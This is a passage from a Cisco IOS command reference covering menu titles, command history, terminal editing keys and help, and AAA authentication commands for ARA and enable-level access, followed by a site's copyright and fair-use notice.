The configuration name of the menu. You can specify a maximum of 20 characters.
delimiter
Characters that mark the beginning and end of a title. Text delimiters are characters that do not ordinarily appear within the text of a title, such as slash ( / ), double quote ("), and tilde ( ~ ). Ctrl-C is reserved for special use and should not be used in the text of the title.
Command Mode
Global configuration
Usage Guidelines
This command first appeared in Cisco IOS Release 10.0.
The
menu
title
command must use the same menu name used with the
menu text
and
menu command
commands used to create a menu.
You can position the title of the menu horizontally by preceding the title text with blank characters. You can also add lines of space above and below the title by pressing Return.
Follow the
title
keyword with one or more blank characters and a delimiting character of your choice. Then enter one or more lines of text, ending the title with the same delimiting character. You cannot use the delimiting character within the text of the message.
When you are configuring from a terminal and are attempting to include special control characters, such as a screen-clearing string, you must use Ctrl-V before the special control characters so that they are accepted as part of the title string. The string
^[[H^[[J
is an escape string used by many VT100-compatible terminals to clear the screen. To use a special string, you must enter
Ctrl-V
before each escape character.
You also can use the
clear-screen
option of the
menu
command to clear the screen before displaying menus and submenus, instead of embedding a terminal-specific string in the menu title. The
clear-screen
option allows the same menu to be used on different types of terminals.
Example
The following example specifies the title that will be displayed when the menu
Access1
is invoked:
cs101(config)# menu Access1 title /^[[H^[[J
Welcome to Access1 Internet Services
Type a number to select an option;
Type 9 to exit the menu.
Related Commands
A dagger (†) indicates that the command is documented outside this chapter.
menu (global)
menu command
menu text
resume
†
[12.1.8] show history
To list the commands you have entered in the current EXEC session, use the
show history
EXEC command.
show history
Syntax Description
This command has no arguments or keywords.
Command Mode
EXEC
Usage Guidelines
This command first appeared in Cisco IOS Release 10.0.
The command history feature provides a record of EXEC commands you have entered. The number of commands that the history buffer will record is determined by the
history
size
line configuration command or the
terminal history size
EXEC command.
Key Function
Ctrl-P or Up Arrow Recalls commands in the history buffer in a backward sequence, beginning with the most recent command. Repeat the key sequence to recall successively older commands.
Ctrl-N or Down Arrow Returns to more recent commands in the history buffer after recalling commands with Ctrl-P or the Up Arrow. Repeat the key sequence to recall successively more recent commands.
Sample Display
The following is sample output from the
show history
command, which lists the commands the user has entered in EXEC mode for this session:
Router#
show history
help
where
show hosts
show history
Router#
Related Commands
A dagger (†) indicates that the command is documented outside this chapter.
history
size
terminal history size
†
[12.1.9] terminal editing
To enable the enhanced editing mode on the local line, use the
terminal editing
EXEC command. To disable the enhanced editing mode on the current line, use the
no
form of this command.
terminal editing
terminal no editing
Syntax Description
This command has no arguments or keywords.
Default
Enabled
Command Mode
EXEC
Usage Guidelines
This command first appeared in Cisco IOS Release 10.0.
Keys Function
Tab Completes a partial command name entry. When you enter a unique set of characters and press the Tab key, the system completes the command name. If you enter a set of characters that could indicate more than one command, the system beeps to indicate an error. Enter a question mark (?) immediately following the partial command (no space). The system provides a list of commands that begin with that string.
Delete or Backspace Erases the character to the left of the cursor.
Return At the command line, pressing the Return key performs the function of processing, or carrying out, a command. At the " ---More--- " prompt on a terminal screen, pressing the Return key scrolls down a line.
Space Bar Scrolls down a page on the terminal screen. Press the space bar when you see the line
" ---More--- " on the screen to display the next screen.
Left arrow
M
oves the cursor one character to the left. When you enter a command that extends beyond a single line, you can continue to press the left arrow key at any time to scroll back toward the system prompt and verify the beginning of the command entry.
Right arrow1 Moves the cursor one character to the right.
Up arrow1 or Ctrl-P Recalls commands in the history buffer, beginning with the most recent command. Repeat the key sequence to recall successively older commands.
Down arrow1 or
Ctrl-N Return to more recent commands in the history buffer after recalling commands with the
Up arrow or Ctrl-P. Repeat the key sequence to recall successively more recent commands.
Ctrl-A Moves the cursor to the beginning of the line.
Ctrl-B Moves the cursor back one character.
Ctrl-D Deletes the character at the cursor.
Ctrl-E Moves the cursor to the end of the command line.
Ctrl-F Moves the cursor forward one character.
Ctrl-K Deletes all characters from the cursor to the end of the command line.
Ctrl-L and Ctrl-R Redisplays the system prompt and command line.
Ctrl-T Transposes the character to the left of the cursor with the character located at the cursor.
Ctrl-U and Ctrl-X Deletes all characters from the cursor back to the beginning of the command line.
Ctrl-V and Esc Q Inserts a code to indicate to the system that the key stroke immediately following should be treated as a command entry,
not
as an editing key.
Ctrl-W Deletes the word to the left of the cursor.
Ctrl-Y Recalls the most recent entry in the delete buffer. The delete buffer contains the last ten items you have deleted or cut. Ctrl-Y can be used in conjunction with Esc Y.
Ctrl-Z Ends configuration mode and returns you to the EXEC prompt.
Esc B Moves the cursor back one word.
Esc C Capitalizes the word at the cursor.
Esc D Deletes from the cursor to the end of the word.
Esc F Moves the cursor forward one word.
Esc L Changes the word at the cursor to lowercase.
Esc U Capitalizes from the cursor to the end of the word.
Esc Y Recalls the next buffer entry. The buffer contains the last ten items you have deleted. Press Ctrl-Y first to recall the most recent entry. Then press Esc Y up to nine times to recall the remaining entries in the buffer. If you bypass an entry, continue to press Esc Y to cycle back to it.
Key Function
Delete or Backspace Erases the character to the left of the cursor.
Ctrl-W Erases a word.
Ctrl-U Erases a line.
Ctrl-R Redisplays a line.
Ctrl-Z Ends configuration mode and returns to the EXEC prompt.
Return Executes single-line commands.
Example
In the following example, enhanced mode editing is reenabled for the current terminal session:
terminal editing
Related Command
editing
[12.2.0] terminal full-help (EXEC)
To get help for the full set of user-level commands, use the
terminal full-help
EXEC command.
terminal full-help
Syntax Description
This command has no arguments or keywords.
Default
Disabled
Command Mode
EXEC
Usage Guidelines
This command first appeared in Cisco IOS Release 10.0.
The
terminal full-help
command enables (or disables) a user to see all of the help messages available from the terminal. It is used with the
show ?
command.
Example
The following example is output for
show ?
with
terminal full-help
enabled:
Router>
terminal full-help
Router>
show ?
access-lists List access lists
appletalk AppleTalk information
arap Show Appletalk Remote Access statistics
arp ARP table
async Information on terminal lines used as router interfaces...
Related Commands
full-help
help
[12.2.1] terminal history
To enable the command history feature for the current terminal session or change the size of the command history buffer for the current terminal session, use the
terminal history
EXEC command. To disable the command history feature or reset the command history buffer to its default size, use the
no
form of this command.
terminal history
[
size
number-of-lines
]
terminal no history
[
size
]
Syntax Description
size
(Optional) Sets command history buffer size.
number-of-lines
(Optional) Specifies the number of command lines that the system will record in its history buffer. The range is 0 to 256.
Default
10 lines
Command Mode
EXEC
Usage Guidelines
This command first appeared in Cisco IOS Release 10.0.
The
history
command without the
size
keyword and argument enables the command history feature with the last buffer size specified or the default size. The
no history
command without the
size
keyword disables the command history feature. The
no history size
command resets the buffer size to the default of 10 command lines.
The
history
command provides a record of EXEC commands you have entered. This feature is particularly useful to recall long or complex commands or entries, including access lists.
Key Function
Ctrl-P or up arrow
Recalls commands in the history buffer in a backward sequence, beginning with the most recent command. Repeat the key sequence to recall successively older commands.
Ctrl-N or down arrow1 Returns to more recent commands in the history buffer after recalling commands with Ctrl-P or the up arrow. Repeat the key sequence to recall successively more recent commands.
1 The arrow keys function only with ANSI-compatible terminals such as VT100s.
Example
In the following example, the number of command lines recorded is set to 15 for the local line:
terminal history size 15
Related Commands
history
show history
[12.2.2] Network Access Security Commands
This chapter describes the commands used to manage security on the network.
[12.2.3] aaa authentication arap
To enable an Authentication Authorization and Accounting (AAA) authentication method for AppleTalk Remote Access (ARA) users using TACACS+, use the
aaa authentication arap
global configuration command. Use the
no
form of this command to disable this authentication.
aaa authentication arap
{
default
|
list-name
}
method1
[...[
method4
]]
no aaa authentication arap
{
default
|
list-name
}
method1
[...[
method4
]]
Syntax Description
default
Uses the listed methods that follow this argument as the default list of methods when a user logs in.
list-name
Character string used to name the following list of authentication methods tried when a user logs in.
method
One of the keywords described in Table 1.
Default
If the
default
list is not set, only the local user database is checked. This version has the same effect as the following command:
aaa authentication arap default local
Command Mode
Global configuration
Usage Guidelines
This command first appeared in Cisco IOS Release 10.3.
The list names and default that you set with the
aaa authentication arap
command are used with the
arap authentication
command. These lists can contain up to four authentication methods that are used when a user tries to log in with ARA. Note that ARAP guest logins are disabled by default when you enable AAA/TACACS+. To allow guest logins, you must use either the
guest
or
auth-guest
method listed in Table 1. You can only use one of these methods; they are mutually exclusive.
Create a list by entering the
aaa authentication arap
list-name method
command, where
list-name
is any character string used to name this list (such as
MIS-access
.) The
method
argument identifies the list of methods the authentication algorithm tries in the given sequence. You can enter up to four methods.
Use the
show running-config
command to view lists of authentication methods.
Table 1 AAA Authentication ARAP Methods
Keyword Description
guest
Allows guest logins. This method must be the first method listed, but it can be followed by other methods if it does not succeed.
auth-guest
Allows guest logins only if the user has already logged in to EXEC. This method must be the first method listed, but can be followed by other methods if it does not succeed.
line
Uses the line password for authentication.
local
Uses the local username database for authentication.
tacacs+
Uses TACACS+ authentication.
radius
Uses RADIUS authentication.
Note
This command cannot be used with TACACS or extended TACACS.
Examples
The following example creates a list called
MIS-access
, which first tries TACACS+ authentication and then none:
aaa authentication arap MIS-access tacacs+ none
The following example creates the same list, but sets it as the default list that is used for all ARA protocol authentications if no other list is specified:
aaa authentication arap default tacacs+ none
Related Commands
aaa authentication local-override
aaa new-model
aaa new-model
[12.2.4] aaa authentication enable default
To enable AAA authentication to determine if a user can access the privileged command level, use the
aaa authentication enable default
global configuration command. Use the
no
form of this command to disable this authorization method.
aaa authentication enable default
method1
[...[
method4
]]
no aaa authentication enable default
method1
[...[
method4
]]
Syntax Description
method
At least one and up to four of the keywords described in Table 2.
Default
If the
default
list is not set, only the enable password is checked. This version has the same effect as the following command:
aaa authentication enable default enable
On the console, the enable password is used if it exists. If no password is set, the process will succeed anyway.
Command Mode
Global configuration
Usage Guidelines
This command first appeared in Cisco IOS Release 10.3.
Use the
aaa authentication enable default
command to create a series of authentication methods that are used to determine whether a user can access the privileged command level. You can specify up to four authentication methods. Method keywords are described in Table 2. The additional methods of authentication are used only if the previous method returns an error, not if it fails. To specify that the authentication should succeed even if all methods return an error, specify
none
as the final method in the command line.
If a default authentication routine is not set for a function, the default is
none
and no authentication is performed. Use the
show running-config
command to view currently configured lists of authentication methods.
Table 2 AAA Authentication Enable Default Methods
]
Cross-Indexed:
The MH DeskReference - IV
Some pages may require Adobe
Acrobat Reader
™
Copyright and Fair Use Information:
The contents of this web site is protected by international copyright laws and may not be reproduced in any form or manner whatsoever, if for the purpose of resale or solicitation of a donation. The essays included here, may be reproduced only if: 1)They are not altered in any way; 2) reproductions must be accompanied by this copyright page ; and 3) it is given freely and without charge.
Fair use:
The fair use of copyrighted work, including such use by reproduction in copies or phonorecords or by any other means specified in above sections, for purposes such as criticism, comment, news reporting, teaching (including multiple copies for classroom use), scholarship, or research, is not an infringement of copyright. In determining whether the use made of a work in any particular case is fair use the factors to be considered include : (1) the purpose and character of the use, including whether the use is of a commercial nature or is for nonprofit educational purposes; (2) the nature of the copyrighted work; (3) the amount and substantiality of the portion used in relation to the copyrighted work as a whole, and; (4) the effect of the use upon the potential market value of the copyrighted work.
Home
|
About Narrative?
|
Contact
Copyright © 2025. All Rights Reserved
HAG122125 (1998 -2026)